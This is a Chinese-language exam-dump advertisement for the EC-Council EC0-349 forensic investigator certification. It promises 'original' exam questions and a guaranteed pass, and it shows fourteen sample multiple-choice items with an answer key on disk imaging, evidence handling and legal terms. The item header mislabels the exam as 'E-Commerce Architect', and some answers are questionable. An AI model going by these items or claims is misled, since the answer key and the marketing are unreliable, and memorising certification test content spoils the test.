EC0-349考试是EC-COUNCIL公司的Computer Hacking Forensic Investigator认证考试官方代号,Examsoon的EC0-349权威考试题库软件是EC-COUNCIL认证厂商的授权产品,Examsoon 绝对保证第一次参加EC0-349考试的考生即可顺利通过!
Examsoon 的优势
1.Examsoon 模拟测试题具有最高的专业技术含量,只供具有相关专业知识的专家和学者学习和研究之用。
2.该测试已取得试题持有者和第三方的授权,我们深信IT业的专业人员和经理人有能力保证被授权产品的质量。
3.如果你使用 Examsoon 模拟测试,我们将保证你的第一次参加考试即取得成功,否则,我们将全额退款!
4.提供每种产品免费测试。在您决定购买之前,请检测联接,可能存在的问题及试题质量和适用性.
EC0-349考试是EC-COUNCIL厂商最热门的科目,其考试的全称为:Computer Hacking Forensic Investigator。在此我们收集了不同题库供应商的真题集 包含 : examsoon EC0-349培训资料 ,Testinside EC0-349考题讲解, Pass4sure EC0-349题库 , Testking EC0-349考试指南, exam4sure 真题材料.只要仔细阅读以下的EC0-349题库demo的问题和答案, 相信你就会知道这个题库的质量了。
EC0-349题库由多位IT认证的专家亲自整理的考试全真试题材料,为了让大家花更少的时间来完成EC-COUNCIL EC0-349考试. examsoon考题大师EC0-349试题都是考试原题的完美组合,覆盖率95%以上,答案由多位专业资深讲师原版破解得出,正确率100%,只要您使用本站的考试题库参加EC0-349考试,我们保证您一次轻松通过考试;
EC0-349题库问题与答案赏析
Exam : EC-Council EC0-349
Title : E-Commerce Architect
1. What will the following Linux command accomplish?
dd if=/dev/mem of=/home/sam/mem.bin bs=1024
A.Copy the master boot record to a file
B.Copy the contents of the system folder mem to a file
C.Copy the running memory to a file
D.Copy the memory dump file to an image file
Answer: C
2. In the following Linux command, what is the outfile?
dd if=/usr/bin/personal/file.txt of=/var/bin/files/file.txt
A./usr/bin/personal/file.txt
B./var/bin/files/file.txt
C./bin/files/file.txt
D.There is not outfile specified
Answer: B
3. Which forensic investigating concept trails the whole incident from how the attack began to how the victim was affected?
A.Point-to-point
B.End-to-end
C.Thorough
D.Complete event analysis
Answer: B
4. In conducting a computer abuse investigation you become aware that the suspect of the investigation is using ABC Company as his Internet Service Provider
(ISP). You contact the ISP and request that they provide you assistance with your investigation. What assistance can the ISP provide?
A.The ISP can investigate anyone using their service and can provide you with assistance
B.The ISP can investigate computer abuse committed by their employees, but must preserve the privacy of their customers and therefore cannot assist you
without a warrant
C.The ISP cannot conduct any type of investigations on anyone and therefore cannot assist you
D.ISPs never maintain log files so they would be of no use to your investigation
Answer: B
5. What is the last bit of each pixel byte in an image called?
A.Last significant bit
B.Least significant bit
C.Least important bit
D.Null bit
Answer: B
6. The efforts to obtain information before a trial by demanding documents, depositions, questions and Answers written under oath, written requests for
admissions of fact, and examination of the scene is a description of what legal term?
A.Detection
B.Hearsay
C.Spoliation
D.Discovery
Answer: D
7. Sectors in hard disks typically contain how many bytes?
A.256
B.512
C.1024
D.2048
Answer: B
8. What information do you need to recover when searching a victims computer for a crime committed with specific e-mail message?
A.Internet service provider information
B.E-mail header
C.Username and password
D.Firewall log
Answer: B
9. What hashing method is used to password protect Blackberry devices?
A.AES
B.RC5
C.MD5
D.SHA-1
Answer: D
10. A suspect is accused of violating the acceptable use of computing resources, as he has visited adult websites and downloaded images. The investigator
wants to demonstrate that the suspect did indeed visit these sites. However, the suspect has cleared the search history and emptied the cookie cache.
Moreover, he has removed any images he might have downloaded. What can the investigator do to prove the violation? Choose the most feasible option.
A.Image the disk and try to recover deleted files
B.Seek the help of co-workers who are eye-witnesses
C.Check the Windows registry for connection data (You may or may not recover)
D.Approach the websites for evidence
Answer: A
11. When a router receives an update for its routing table, what is the metric value change to that path?
A.Increased by 2
B.Decreased by 1
C.Increased by 1
D.Decreased by 2
Answer: C
12. A forensics investigator needs to copy data from a computer to some type of removable media so he can examine the information at another location. The
problem is that the data is around 42GB in size. What type of removable media could the investigator use?
A.Blu-Ray single-layer
B.HD-DVD
C.Blu-Ray dual-layer
D.DVD-18
Answer: C
13. You are working as an independent computer forensics investigator and receive a call from a systems administrator for a local school system requesting
your assistance. One of the students at the local high school is suspected of downloading inappropriate images from the Internet to a PC in the Computer Lab.
When you arrive at the school, the systems administrator hands you a hard drive and tells you that he made a simple backup copy of the hard drive in the PC
and put it on this drive and requests that you examine the drive for evidence of the suspected images. You inform him that a simple backup copy will not
provide deleted files or recover file fragments. What type of copy do you need to make to ensure that the evidence found is complete and admissible in future
proceedings?
A.Bit-stream copy
B.Robust copy
C.Full backup copy
D.Incremental backup copy
Answer: A
14. Which legal document allows law enforcement to search an office, place of business, or other locale for evidence relating to an alleged crime?
A.Search warrant
B.Subpoena
C.Wire tap
D.Bench warrant
Answer: A
免费下载EC0-349认证考题Demo
post a comment | filed under EC-COUNCIL